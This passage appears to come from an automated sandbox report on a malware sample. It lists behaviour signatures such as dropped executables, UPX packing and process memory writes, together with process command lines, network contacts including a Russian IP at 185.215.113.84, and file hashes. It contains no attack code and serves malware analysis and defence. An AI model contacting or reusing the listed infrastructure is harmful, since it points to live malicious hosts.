| N/A | N/A | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| N/A | N/A | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
| N/A | N/A | C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\96c5607aa1a1082ff6659842855fe584e1467a2119de3c017ff20b7c317adf7a.exe
"C:\Users\Admin\AppData\Local\Temp\96c5607aa1a1082ff6659842855fe584e1467a2119de3c017ff20b7c317adf7a.exe"
C:\Users\Admin\AppData\Local\Temp\96c5607aa1a1082ff6659842855fe584e1467a2119de3c017ff20b7c317adf7amgr.exe
C:\Users\Admin\AppData\Local\Temp\96c5607aa1a1082ff6659842855fe584e1467a2119de3c017ff20b7c317adf7amgr.exe
C:\Program Files\Internet Explorer\iexplore.exe
"C:\Program Files\Internet Explorer\iexplore.exe"
C:\Program Files\Internet Explorer\iexplore.exe
"C:\Program Files\Internet Explorer\iexplore.exe"
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:980 CREDAT:275457 /prefetch:2
C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
"C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:904 CREDAT:275457 /prefetch:2
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | api.bing.com | udp |
| US | 204.79.197.200:443 | ieonline.microsoft.com | tcp |
| RU | 185.215.113.84:80 | 185.215.113.84 | tcp |
Files
memory/896-54-0x0000000075B41000-0x0000000075B43000-memory.dmp
\Users\Admin\AppData\Local\Temp\96c5607aa1a1082ff6659842855fe584e1467a2119de3c017ff20b7c317adf7amgr.exe
| MD5 | 3235c81e22fad625ce09ae351091f7cc |
| SHA1 | 1a670de8ab6014928459f0c1631db644f7d7526e |
| SHA256 | 85d274964f8e3cba910a4922bdbdc0ed3b064c0045db18c85d8d2a853d00e7a6 |
| SHA512 | 95797149ba60dc13795798549d566f309796ac7daad849c5295516855f53617c92e29a119d93a5da87d50a16d6a34308b3b0b0d0b3974b899fe2f21ca83f041b |
memory/872-57-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\96c5607aa1a1082ff6659842855fe584e1467a2119de3c017ff20b7c317adf7amgr.exe
| MD5 | 3235c81e22fad625ce09ae351091f7cc |
| SHA1 | 1a670de8ab6014928459f0c1631db644f7d7526e |
| SHA256 | 85d274964f8e3cba910a4922bdbdc0ed3b064c0045db18c85d8d2a853d00e7a6 |
| SHA512 | 95797149ba60dc13795798549d566f309796ac7daad849c5295516855f53617c92e29a119d93a5da87d50a16d6a34308b3b0b0d0b3974b899fe2f21ca83f041b |
C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{594ADA81-3F1E-11ED-B390-DA7E66F9F45D}.dat
| MD5 | eff6be6bd7ec2f9dc538a355cffd89e4 |
| SHA1 | 832a5132e5944894d51b9d4192ffb2cda2476c45 |
| SHA256 | 2cc00e73ad08ed84afb87c4698e7c2cb903185502ba64ccb2d632bb60cc6abc4 |
| SHA512 | c85887f6a7e94f3aa37f6a07d91b38dc2515eaa9ffa55256a47fd46cbbaff8071926602fc25bc55e17565c57a5bc4fe7f41e6acfce7a71d86acbd153df0a2b85 |
memory/896-62-0x0000000000170000-0x00000000001CD000-memory.dmp
memory/872-63-0x0000000000400000-0x000000000045D000-memory.dmp
memory/896-61-0x0000000000920000-0x0000000000941000-memory.dmp
C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\Recovery\High\Active\RecoveryStore.{594AB371-3F1E-11ED-B390-DA7E66F9F45D}.dat
| MD5 | be22137c0c5e632ca1a693823931fb7d |
| SHA1 | 40b665476fdd66c579ba5f69d6e4d970b777bd66 |
| SHA256 | c542de8445734698dc643a44e055ca0828a8f7c4592745d658c210c06e078321 |
| SHA512 | 680239715703953ad867c27b9003a0041f47938707715099af01b69160b7d0b60f71530e0158b06de93ae82cc08c875e709a2f41d69402c296c6bb9ad7325a44 |
memory/872-64-0x0000000000400000-0x000000000045D000-memory.dmp
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Cookies\3XG2GOE7.txt
| MD5 | 72c7074572adc0c7ff1ffd9674745819 |
| SHA1 | d56c295799a1e4ed821b23af2058c68efe938918 |
| SHA256 | 1bb6f1c405c7e78aeddd4a7ad916ade234f92498246a12e5688865b3afdecc7e |
| SHA512 | f593483d8c2ae27211ee07884fa325cc76eb02a26e70981cf6cd2773fd5834debcb9c1e22b9869b11952ffc8935c58e47b1f924489418121b1bee12bdb767472 |
Analysis: behavioral2
Detonation Overview
Submitted
2022-09-28 09:11
Reported
2022-09-28 09:14
Platform
win10v2004-20220812-en
Max time kernel
91s
Max time network
154s
Command Line
Signatures
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\1c50e838ff24a46f03e9afe9415b2002cda7e1479c4cff3884e49fc0e644288cmgr.exe | N/A |
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-2295526160-1155304984-640977766-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\1c50e838ff24a46f03e9afe9415b2002cda7e1479c4cff3884e49fc0e644288c.exe | N/A |
Enumerates physical storage devices
Program crash
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WerFault.exe | C:\Users\Admin\AppData\Local\Temp\1c50e838ff24a46f03e9afe9415b2002cda7e1479c4cff3884e49fc0e644288cmgr.exe |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\1c50e838ff24a46f03e9afe9415b2002cda7e1479c4cff3884e49fc0e644288c.exe
"C:\Users\Admin\AppData\Local\Temp\1c50e838ff24a46f03e9afe9415b2002cda7e1479c4cff3884e49fc0e644288c.exe"
C:\Users\Admin\AppData\Local\Temp\1c50e838ff24a46f03e9afe9415b2002cda7e1479c4cff3884e49fc0e644288cmgr.exe
C:\Users\Admin\AppData\Local\Temp\1c50e838ff24a46f03e9afe9415b2002cda7e1479c4cff3884e49fc0e644288cmgr.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 376 -p 4292 -ip 4292
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4292 -s 272
Network
| Country | Destination | Domain | Proto |
| AU | 104.46.162.226:443 | N/A | tcp |
| US | 67.24.171.254:80 | N/A | tcp |
| US | 67.24.171.254:80 | N/A | tcp |
| US | 67.24.171.254:80 | N/A | tcp |
| RU | 185.215.113.84:80 | 185.215.113.84 | tcp |
Files
memory/4292-132-0x0000000000000000-mapping.dmp
C:\Users\Admin\AppData\Local\Temp\1c50e838ff24a46f03e9afe9415b2002cda7e1479c4cff3884e49fc0e644288cmgr.exe
| MD5 | 3235c81e22fad625ce09ae351091f7cc |
| SHA1 | 1a670de8ab6014928459f0c1631db644f7d7526e |
| SHA256 | 85d274964f8e3cba910a4922bdbdc0ed3b064c0045db18c85d8d2a853d00e7a6 |
| SHA512 | 95797149ba60dc13795798549d566f309796ac7daad849c5295516855f53617c92e29a119d93a5da87d50a16d6a34308b3b0b0d0b3974b899fe2f21ca83f041b |
memory/1800-135-0x0000000000210000-0x0000000000231000-memory.dmp
memory/4292-136-0x0000000000400000-0x000000000045D000-memory.dmp